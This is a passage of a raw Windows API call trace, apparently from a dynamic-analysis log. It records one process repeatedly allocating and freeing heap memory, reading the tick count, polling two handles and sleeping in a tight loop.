hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.349] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.349] GetTickCount () returned 0x2169864 [0189.349] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.349] GetTickCount () returned 0x2169864 [0189.349] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.349] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0189.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.352] GetTickCount () returned 0x216a109 [0189.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.352] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.352] GetTickCount () returned 0x216a109 [0189.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.353] GetTickCount () returned 0x216a109 [0189.353] GetTickCount () returned 0x216a109 [0189.353] GetTickCount () returned 0x216a109 [0189.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.353] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.353] GetTickCount () returned 0x216a109 [0189.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.353] GetTickCount () returned 0x216a109 [0189.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.353] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.356] GetTickCount () returned 0x216a99f [0189.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0189.356] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.356] GetTickCount () returned 0x216a99f [0189.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.356] GetTickCount () returned 0x216a99f [0189.356] GetTickCount () returned 0x216a99f [0189.356] GetTickCount () returned 0x216a99f [0189.356] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.356] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.356] GetTickCount () returned 0x216a99f [0189.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.356] GetTickCount () returned 0x216a99f [0189.356] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0189.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.365] GetTickCount () returned 0x216b235 [0189.365] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.365] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.365] GetTickCount () returned 0x216b235 [0189.365] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.365] GetTickCount () returned 0x216b235 [0189.365] GetTickCount () returned 0x216b235 [0189.365] GetTickCount () returned 0x216b235 [0189.365] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.365] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.365] GetTickCount () returned 0x216b235 [0189.365] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.365] GetTickCount () returned 0x216b235 [0189.365] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.365] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.368] GetTickCount () returned 0x216badb [0189.368] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0189.368] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.368] GetTickCount () returned 0x216badb [0189.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.369] GetTickCount () returned 0x216badb [0189.369] GetTickCount () returned 0x216badb [0189.369] GetTickCount () returned 0x216badb [0189.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.369] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.369] GetTickCount () returned 0x216badb [0189.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.369] GetTickCount () returned 0x216badb [0189.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.369] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0189.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.372] GetTickCount () returned 0x216c371 [0189.372] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.372] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.372] GetTickCount () returned 0x216c371 [0189.372] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.372] GetTickCount () returned 0x216c371 [0189.372] GetTickCount () returned 0x216c371 [0189.372] GetTickCount () returned 0x216c371 [0189.372] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.372] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.374] GetTickCount () returned 0x216c371 [0189.374] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.374] GetTickCount () returned 0x216c371 [0189.374] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.374] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.377] GetTickCount () returned 0x216cc07 [0189.377] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651b0 [0189.377] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.377] GetTickCount () returned 0x216cc07 [0189.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.378] GetTickCount () returned 0x216cc07 [0189.378] GetTickCount () returned 0x216cc07 [0189.378] GetTickCount () returned 0x216cc07 [0189.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.378] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.378] GetTickCount () returned 0x216cc07 [0189.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0189.378] GetTickCount () returned 0x216cc07 [0189.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798c0 | out: hHeap=0x2150000) returned 1 [0189.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651b0 | out: hHeap=0x2150000) returned 1 [0189.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.381] GetTickCount () returned 0x216d49d [0189.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0189.381] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.381] GetTickCount () returned 0x216d49d [0189.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0189.381] GetTickCount () returned 0x216d49d [0189.381] GetTickCount () returned 0x216d49d [0189.381] GetTickCount () returned 0x216d49d [0189.381] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798c0 | out: hHeap=0x2150000) returned 1 [0189.381] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.381] GetTickCount () returned 0x216d49d [0189.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.381] GetTickCount () returned 0x216d49d [0189.381] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.381] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0189.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.384] GetTickCount () returned 0x216dd43 [0189.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.384] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.385] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.385] GetTickCount () returned 0x216dd43 [0189.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.385] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.390] GetTickCount () returned 0x216e5d9 [0189.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.390] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.390] GetTickCount () returned 0x216e5d9 [0189.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.390] GetTickCount () returned 0x216e5d9 [0189.390] GetTickCount () returned 0x216e5d9 [0189.390] GetTickCount () returned 0x216e5d9 [0189.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.391] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.391] GetTickCount () returned 0x216e5d9 [0189.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.391] GetTickCount () returned 0x216e5d9 [0189.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.396] GetTickCount () returned 0x216ee6f [0189.396] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0189.396] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.396] GetTickCount () returned 0x216ee6f [0189.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.397] GetTickCount () returned 0x216ee6f [0189.397] GetTickCount () returned 0x216ee6f [0189.397] GetTickCount () returned 0x216ee6f [0189.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.397] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.397] GetTickCount () returned 0x216ee6f [0189.397] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.397] GetTickCount () returned 0x216ee6f [0189.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.397] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0189.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.400] GetTickCount () returned 0x216f714 [0189.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.400] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.400] GetTickCount () returned 0x216f714 [0189.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.400] GetTickCount () returned 0x216f714 [0189.400] GetTickCount () returned 0x216f714 [0189.400] GetTickCount () returned 0x216f714 [0189.400] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.400] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.400] GetTickCount () returned 0x216f714 [0189.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.400] GetTickCount () returned 0x216f714 [0189.400] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.400] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.403] GetTickCount () returned 0x216ffaa [0189.403] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.403] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.403] GetTickCount () returned 0x216ffaa [0189.404] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.404] GetTickCount () returned 0x216ffaa [0189.404] GetTickCount () returned 0x216ffaa [0189.404] GetTickCount () returned 0x216ffaa [0189.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.404] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.404] GetTickCount () returned 0x216ffaa [0189.404] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.404] GetTickCount () returned 0x216ffaa [0189.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.407] GetTickCount () returned 0x2170840 [0189.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0189.407] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.408] GetTickCount () returned 0x2170840 [0189.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.408] GetTickCount () returned 0x2170840 [0189.408] GetTickCount () returned 0x2170840 [0189.408] GetTickCount () returned 0x2170840 [0189.408] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.408] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.408] GetTickCount () returned 0x2170840 [0189.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.408] GetTickCount () returned 0x2170840 [0189.408] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.408] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0189.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0189.411] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.411] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.411] GetTickCount () returned 0x21710d6 [0189.411] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.411] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0189.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.414] GetTickCount () returned 0x217197c [0189.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0189.414] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.414] GetTickCount () returned 0x217197c [0189.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.415] GetTickCount () returned 0x217197c [0189.415] GetTickCount () returned 0x217197c [0189.415] GetTickCount () returned 0x217197c [0189.415] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.415] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.415] GetTickCount () returned 0x217197c [0189.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.415] GetTickCount () returned 0x217197c [0189.415] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.415] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0189.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.418] GetTickCount () returned 0x2172212 [0189.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0189.418] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.418] GetTickCount () returned 0x2172212 [0189.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.418] GetTickCount () returned 0x2172212 [0189.418] GetTickCount () returned 0x2172212 [0189.418] GetTickCount () returned 0x2172212 [0189.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.418] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.418] GetTickCount () returned 0x2172212 [0189.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0189.418] GetTickCount () returned 0x2172212 [0189.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0189.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0189.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.422] GetTickCount () returned 0x2172aa8 [0189.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0189.422] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.422] GetTickCount () returned 0x2172aa8 [0189.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.422] GetTickCount () returned 0x2172aa8 [0189.422] GetTickCount () returned 0x2172aa8 [0189.422] GetTickCount () returned 0x2172aa8 [0189.422] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.423] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.423] GetTickCount () returned 0x2172aa8 [0189.423] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.423] GetTickCount () returned 0x2172aa8 [0189.423] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.423] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0189.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.429] GetTickCount () returned 0x217333e [0189.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0189.429] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.429] GetTickCount () returned 0x217333e [0189.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.429] GetTickCount () returned 0x217333e [0189.429] GetTickCount () returned 0x217333e [0189.429] GetTickCount () returned 0x217333e [0189.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.429] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.429] GetTickCount () returned 0x217334e [0189.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.429] GetTickCount () returned 0x217334e [0189.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0189.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.432] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.432] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.432] GetTickCount () returned 0x2173be4 [0189.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.435] GetTickCount () returned 0x217447a [0189.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.435] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.435] GetTickCount () returned 0x217447a [0189.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.436] GetTickCount () returned 0x217447a [0189.436] GetTickCount () returned 0x217447a [0189.436] GetTickCount () returned 0x217447a [0189.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.436] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.436] GetTickCount () returned 0x217447a [0189.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.436] GetTickCount () returned 0x217447a [0189.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.439] GetTickCount () returned 0x2174d10 [0189.439] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0189.439] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.439] GetTickCount () returned 0x2174d10 [0189.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.440] GetTickCount () returned 0x2174d10 [0189.440] GetTickCount () returned 0x2174d10 [0189.440] GetTickCount () returned 0x2174d10 [0189.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.440] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.440] GetTickCount () returned 0x2174d10 [0189.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.440] GetTickCount () 